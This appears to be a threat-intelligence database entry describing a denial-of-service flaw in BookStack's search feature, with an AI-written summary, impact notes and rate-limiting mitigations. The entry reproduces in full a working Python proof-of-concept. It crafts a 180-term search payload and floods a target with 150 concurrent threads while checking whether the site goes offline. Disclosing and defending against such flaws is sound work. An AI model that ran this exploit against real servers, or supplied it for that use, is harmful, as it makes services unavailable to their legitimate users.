BookStack 25.12.1 - Denial of Service
A denial of service (DoS) vulnerability affects BookStack versions prior to 25.12.1. The issue arises from the search functionality, which constructs complex SQL queries with many OR LIKE conditions, full table scans, and subqueries, leading to resource exhaustion. Exploit code in Python is publicly available demonstrating how to overwhelm the service by sending many concurrent search requests with a crafted payload. No official patch or vendor advisory confirming a fix is provided in the data. The severity is assessed as medium based on the described impact and available information.
AI Analysis
Technical Summary
BookStack versions before 25.12.1 are vulnerable to a denial of service attack via the search feature. The exploit sends a search query containing 180 terms that generate expensive SQL queries involving multiple OR LIKE clauses, full table scans, and subqueries. This causes resource exhaustion on the backend database and web server, resulting in service unavailability. A Python-based proof-of-concept exploit uses 150 concurrent threads to repeatedly send the malicious search request, causing timeouts and connection errors. The vulnerability is publicly documented with exploit code but lacks an assigned CVE and official patch information.
Potential Impact
Successful exploitation results in denial of service, making the BookStack application unavailable or unresponsive to legitimate users. The attack leverages resource exhaustion through complex search queries, impacting service availability but not directly indicating data compromise or privilege escalation. There are no known exploits in the wild reported at this time.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, consider limiting or rate-limiting search requests, especially those with complex or large query terms, to reduce the risk of resource exhaustion. Monitor for updates from the BookStack project regarding security advisories and patches.
Indicators of Compromise
- exploit-code:

```python
# Exploit Title: BookStack 25.12.1 - Denial of Service Search Terms (Resource Exhaustion)
# Date: 2026-04-29
# Exploit Author: Gabriel Rodrigues (TEXUGO)
# Vendor Homepage: https://www.bookstackapp.com
# Software Link: https://github.com/BookStackApp/BookStack
# Version: < 25.12.1
# Tested on: BookStack v25.12 (Docker) + PHP 8.3 + MySQL 8.0
# CVE: Pending (Request ID: 1970573)
# References:
# https://www.bookstackapp.com/blog/bookstack-release-v25-12-1/
# https://github.com/BookStackApp/BookStack/security/advisories (if any)
"""
BookStack DoS PoC
python3 poc_dos_search.py http://localhost:8080 [cookie]
"""
import requests, sys, time
from urllib.parse import quote
from concurrent.futures import ThreadPoolExecutor

# Payload: 100 plain terms + 50 exact phrases + 30 tags = 180 search terms
# Produces a SQL query with many OR LIKE clauses, full table scans and subqueries
PAYLOAD = " ".join([f"t{i}" for i in range(100)]
                   + [f'"e{i}"' for i in range(50)]
                   + [f"[t{i}=v{i}]" for i in range(30)])

stop = False  # shared flag read by the worker threads; set by main() to stop them


def attack(url, headers):
    # Each worker keeps one session and re-sends the same search request until told to stop
    s = requests.Session()
    while not stop:
        try:
            s.get(url, headers=headers, timeout=30)
        except:
            pass


def main():
    global stop
    url = sys.argv[1].rstrip("/")
    cookie = sys.argv[2] if len(sys.argv) > 2 else None
    search_url = f"{url}/search?term={quote(PAYLOAD)}"
    headers = {"Cookie": cookie} if cookie else {}
    print(f"[*] Query: {PAYLOAD[:80]}...")
    print(f"[*] URL completa tem {len(search_url)} bytes")
    print(f"[*] Atacando {url} com 150 threads por 30s\n")
    with ThreadPoolExecutor(150) as ex:
        [ex.submit(attack, search_url, headers) for _ in range(150)]
        # Probe the front page every 2 seconds for 30 seconds to observe availability
        for i in range(15):
            time.sleep(2)
            try:
                r = requests.get(url, timeout=3)
                print(f"[{(i+1)*2:2d}s] ONLINE - {r.status_code}")
            except requests.exceptions.Timeout:
                print(f"[{(i+1)*2:2d}s] OFFLINE - TIMEOUT")
            except:
                print(f"[{(i+1)*2:2d}s] OFFLINE - CONNECTION ERROR")
        # Must be set inside the with-block, otherwise the executor waits forever on the workers
        stop = True


if __name__ == "__main__":
    main()
```
Technical Details
- EDB ID: 52571
- Has Exploit Code: true
- Code Language: python
Threat ID: 6a0f29ffe1370fbb48ed2e8f
Added to database: 5/21/2026, 3:51:27 PM
Last enriched: 5/21/2026, 3:51:52 PM
Last updated: 5/21/2026, 4:58:38 PM